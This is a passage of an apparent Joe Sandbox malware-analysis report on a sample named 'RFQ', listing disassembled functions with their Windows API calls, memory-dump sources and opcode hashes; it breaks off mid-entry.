                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend_wcslen
                                                                            • String ID:
                                                                            • API String ID: 455545452-0
                                                                            • Opcode ID: 9cf2840d7f635499d696f0d90ffb6a717fe24133420df457f6eab05a209bc23e
                                                                            • Instruction ID: 8a7304a5eeec77cd401cd5d1f7fbf658ca8841d664e28f7ed84d1cba8ce291f2
                                                                            • Opcode Fuzzy Hash: 9cf2840d7f635499d696f0d90ffb6a717fe24133420df457f6eab05a209bc23e
                                                                            • Instruction Fuzzy Hash: FC118471600604D6DB249FAC9C84AEE77ACEF51754B50812AF915D61C0DBB8D9C48F64
                                                                            Function 006B1C99 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 60e1286568bd588393a0f0e5fc8286fc7d65affd3420a3527de1b8dcce449ec5
                                                                            • Instruction ID: 277d086fc8bc722a1fbf7148ba76bd18a155b149c107094b62e56e0d075071fc
                                                                            • Opcode Fuzzy Hash: 60e1286568bd588393a0f0e5fc8286fc7d65affd3420a3527de1b8dcce449ec5
                                                                            • Instruction Fuzzy Hash: A401F2F224531A7EF62126786CE4FE7271EDF427B9B744329B120992D2DB648CC15364
                                                                            Function 006E196B Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 006E198B
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E199D
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E19B3
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E19CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: ff31a51e36e5d4bdc4094f147aa2094e8f521513d7d6174180e728c1f3d00653
                                                                            • Instruction ID: 1454d2ffc4511b1d101b10165c5c103bc7f856460cd4768f518edb159c90e11a
                                                                            • Opcode Fuzzy Hash: ff31a51e36e5d4bdc4094f147aa2094e8f521513d7d6174180e728c1f3d00653
                                                                            • Instruction Fuzzy Hash: D4113C3A901218FFEF119BA5CD85FDDBB79FB05754F200095E600B7291D6716E10EB94
                                                                            Function 006EE0F4 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 006EE11B
                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 006EE14E
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006EE164
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006EE16B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                            • String ID:
                                                                            • API String ID: 2880819207-0
                                                                            • Opcode ID: 31333be99414d028a310185e857ed6677e13ac526cc0434ec3fbd5821783be4f
                                                                            • Instruction ID: 55a533e7cc0d54089ec4da905e6bb4f18e9b3007d6b9ab8e80f98f0f7775c438
                                                                            • Opcode Fuzzy Hash: 31333be99414d028a310185e857ed6677e13ac526cc0434ec3fbd5821783be4f
                                                                            • Instruction Fuzzy Hash: 23110876A00358BBC7019FACDC05AEA7BADAB45311F04C115F811D33D0D6B58D4487A4
                                                                            Function 006AD15C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateThread.KERNEL32(00000000,?,006ACF89,00000000,00000004,00000000), ref: 006AD1A8
                                                                            • GetLastError.KERNEL32 ref: 006AD1B4
                                                                            • __dosmaperr.LIBCMT ref: 006AD1BB
                                                                            • ResumeThread.KERNEL32(00000000), ref: 006AD1D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                            • String ID:
                                                                            • API String ID: 173952441-0
                                                                            • Opcode ID: a0d3189f73ad419f4f967b929d5e9a0d3c98f6d9810fd5dde4a9ac2c00d5e9c7
                                                                            • Instruction ID: 5be91e8df5ce9e8162c54f7fe2eb63389457c8666cc472d24c0ac1c610bc923e
                                                                            • Opcode Fuzzy Hash: a0d3189f73ad419f4f967b929d5e9a0d3c98f6d9810fd5dde4a9ac2c00d5e9c7
                                                                            • Instruction Fuzzy Hash: 5301C4765441047BD7217BE5DC09BEA7A6ADF42730F108229F926826D0CB708D418AA5
                                                                            Function 006879B6 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006879F4
                                                                            • GetStockObject.GDI32(00000011), ref: 00687A08
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00687A12
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                            • String ID:
                                                                            • API String ID: 3970641297-0
                                                                            • Opcode ID: 366e42e3a06b6d4b3e6cc9284a88458af1c3bada1a2b4a5419b3e80e95e52451
                                                                            • Instruction ID: 711a07d33d944330d7e195e9e1682e70bb21eaa7444c78048f041bb89a96aef9
                                                                            • Opcode Fuzzy Hash: 366e42e3a06b6d4b3e6cc9284a88458af1c3bada1a2b4a5419b3e80e95e52451
                                                                            • Instruction Fuzzy Hash: 1811C072515508BFEF069F948C40EEABBAAEF0C7A5F108205FA0452150C775DD60EBA0
                                                                            Function 006A3ACC Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 006A3AE6
                                                                              • Part of subcall function 006A3A33: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 006A3A62
                                                                              • Part of subcall function 006A3A33: ___AdjustPointer.LIBCMT ref: 006A3A7D
                                                                            • _UnwindNestedFrames.LIBCMT ref: 006A3AFB
                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 006A3B0C
                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 006A3B34
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                            • String ID:
                                                                            • API String ID: 737400349-0
                                                                            • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                            • Instruction ID: f9e7b87108d473e4910ba322361bdfd527264227e3c7c4df888dae53a563d394
                                                                            • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                            • Instruction Fuzzy Hash: 58012932100159BBCF126E95CC42EEB7B6AEF9A754F054018FE4896221C732ED61DFA4
                                                                            Function 006B3003 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,006C242E,00000000,00000000,?,006B2FAA,006C242E,00000000,00000000,00000000,?,006B321B,00000006,FlsSetValue), ref: 006B3035
                                                                            • GetLastError.KERNEL32(?,006B2FAA,006C242E,00000000,00000000,00000000,?,006B321B,00000006,FlsSetValue,007222B0,FlsSetValue,00000000,00000364,?,006B2DD6), ref: 006B3041
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,006B2FAA,006C242E,00000000,00000000,00000000,?,006B321B,00000006,FlsSetValue,007222B0,FlsSetValue,00000000), ref: 006B304F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 3177248105-0
                                                                            • Opcode ID: c59b4662b2ba16f6c8a3be25e3cc0461babcd984daaf9036cf3213c9af823d60
                                                                            • Instruction ID: 8b47a9d2cffabe644c1c1e02b762a1df45b6d13a4d4457ee8d79dd0911907e07
                                                                            • Opcode Fuzzy Hash: c59b4662b2ba16f6c8a3be25e3cc0461babcd984daaf9036cf3213c9af823d60
                                                                            • Instruction Fuzzy Hash: A601FC76751332EBC7315ABCAC849D67759BF05BA17114620F906D3380CB24D982C7D4
                                                                            Function 006E73BA Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 006E73D5
                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006E73ED
                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006E7402
                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 006E7420
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                            • String ID:
                                                                            • API String ID: 1352324309-0
                                                                            • Opcode ID: 635fe41fb4dc511e5c3d917c89ecf3883794e7c2d558ad89d0a727ff3f262c85
                                                                            • Instruction ID: dc29b3c26c7c707e129ab6ebba865dff5a19c00c3968cbf86041da7dcdbf54b1
                                                                            • Opcode Fuzzy Hash: 635fe41fb4dc511e5c3d917c89ecf3883794e7c2d558ad89d0a727ff3f262c85
                                                                            • Instruction Fuzzy Hash: 09118EB124A350EBE321CF55EC08B927FFDEB00B04F50C529E91AD61D0E7B0E905AB90
                                                                            Function 006EAFC6 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,006EABF1,?,00008000), ref: 006EAFE2
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,006EABF1,?,00008000), ref: 006EB007
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,006EABF1,?,00008000), ref: 006EB011
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,006EABF1,?,00008000), ref: 006EB044
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CounterPerformanceQuerySleep
                                                                            • String ID:
                                                                            • API String ID: 2875609808-0
                                                                            • Opcode ID: 15a09b91dd8a20d637462cd68d29517d4c82738128d9c5feb98d318f7ac13026
                                                                            • Instruction ID: 830d501d12352e1767cd96a0f75ff936f4b44e71ef6ed11105e7378d16b6189b
                                                                            • Opcode Fuzzy Hash: 15a09b91dd8a20d637462cd68d29517d4c82738128d9c5feb98d318f7ac13026
                                                                            • Instruction Fuzzy Hash: C9117C70C4166CEBCF009FE9D9487EFBB79BF19711F108099D851B2280CB346A419B95
                                                                            Function 006E2CEB Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 006E2D09
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 006E2D1A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 006E2D21
                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 006E2D28
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 2710830443-0
                                                                            • Opcode ID: 0c1f4dd61bfc14c9708ec744e57dadb97cd90c4d35c6d4edd5c0dbf04fe7975d
                                                                            • Instruction ID: 061c620e5ba492feeabed1b09ec409dfe8f65f348d71d09b79f84e90da84f5a6
                                                                            • Opcode Fuzzy Hash: 0c1f4dd61bfc14c9708ec744e57dadb97cd90c4d35c6d4edd5c0dbf04fe7975d
                                                                            • Instruction Fuzzy Hash: 3EE09B7158132876D72117B79C0EEE73E2EEF46B61F108015F205D10D0D694C841C1B0
                                                                            Function 00718755 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0069AABF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0069AB19
                                                                              • Part of subcall function 0069AABF: SelectObject.GDI32(?,00000000), ref: 0069AB28
                                                                              • Part of subcall function 0069AABF: BeginPath.GDI32(?), ref: 0069AB3F
                                                                              • Part of subcall function 0069AABF: SelectObject.GDI32(?,00000000), ref: 0069AB68
                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00718779
                                                                            • LineTo.GDI32(?,?,?), ref: 00718786
                                                                            • EndPath.GDI32(?), ref: 00718796
                                                                            • StrokePath.GDI32(?), ref: 007187A4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                            • String ID:
                                                                            • API String ID: 1539411459-0
                                                                            • Opcode ID: 80b6a2fc30321becf5c174bd70c57b5cd99a35851748c7fbaf048fb326da4a2e
                                                                            • Instruction ID: 2b691452aa1da31e4c70658582f4f25656c6a0e900b5d1afd981ae0fabf392dd
                                                                            • Opcode Fuzzy Hash: 80b6a2fc30321becf5c174bd70c57b5cd99a35851748c7fbaf048fb326da4a2e
                                                                            • Instruction Fuzzy Hash: 82F03A32081298BADB135FD8AC09FCE3B59AF0A711F18C100FA11650E1C7B95551DBEA
                                                                            Function 0069AD30 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008), ref: 0069AD4C
                                                                            • SetTextColor.GDI32(?,?), ref: 0069AD56
                                                                            • SetBkMode.GDI32(?,00000001), ref: 0069AD69
                                                                            • GetStockObject.GDI32(00000005), ref: 0069AD71
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ModeObjectStockText
                                                                            • String ID:
                                                                            • API String ID: 4037423528-0
                                                                            • Opcode ID: 49a68fbef98372cbbfb2b822898b025f53b09dfa45dc5f5bb21c4e16859878a2
                                                                            • Instruction ID: 9ecc5104deade24c4f3d82d614ef6af72de372eed8346269fcfdcac7b524d024
                                                                            • Opcode Fuzzy Hash: 49a68fbef98372cbbfb2b822898b025f53b09dfa45dc5f5bb21c4e16859878a2
                                                                            • Instruction Fuzzy Hash: E3E092316C4284BEDB225BB8AC09BD83B62EF12336F14C31AF6FA481E1C3755940AB11
                                                                            Function 006E156F Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThread.KERNEL32 ref: 006E1578
                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,006E111D), ref: 006E157F
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006E111D), ref: 006E158C
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,006E111D), ref: 006E1593
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3974789173-0
                                                                            • Opcode ID: 16799760002d5d651042572be89649b3f4971b55ca0d792588992778826da9fb
                                                                            • Instruction ID: 94cdfd55d3b1fb9ac96c3032333d3c078101905e7f89fbadfc3023e8272dbd01
                                                                            • Opcode Fuzzy Hash: 16799760002d5d651042572be89649b3f4971b55ca0d792588992778826da9fb
                                                                            • Instruction Fuzzy Hash: FCE04FB16823119BD6201BF5AD0CBD63F69AF49792F10C404A246CD0D0D67884408755
                                                                            Function 006DE008 Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 006DE008
                                                                            • GetDC.USER32(00000000), ref: 006DE012
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006DE01E
                                                                            • ReleaseDC.USER32(?), ref: 006DE03F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: b62355c061c9194d27187f2dc4d3dfa3da8946a3141645abe1c0d8f5ab2d47ff
                                                                            • Instruction ID: c4af8031a418f21c28eadc32763ccdf046841be4bb1b61c8ef11832e01647d8e
                                                                            • Opcode Fuzzy Hash: b62355c061c9194d27187f2dc4d3dfa3da8946a3141645abe1c0d8f5ab2d47ff
                                                                            • Instruction Fuzzy Hash: 01E09AB5840214DFCF529FE8D848AADBBB6AB08711B10C459E949E7290C73D5A41DF54
                                                                            Function 006D2BE2 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString
                                                                            • String ID: @COM_EVENTOBJ$Qdn
                                                                            • API String ID: 2948472770-1502889352
                                                                            • Opcode ID: ed553573d6a94428410203fbfdf3fec6bdcda65e340c4f1f849d7a52fd73c353
                                                                            • Instruction ID: 565772530c45d848bb865c55b49c5de17f03de9aa8cde06ea3e8a27a97052e74
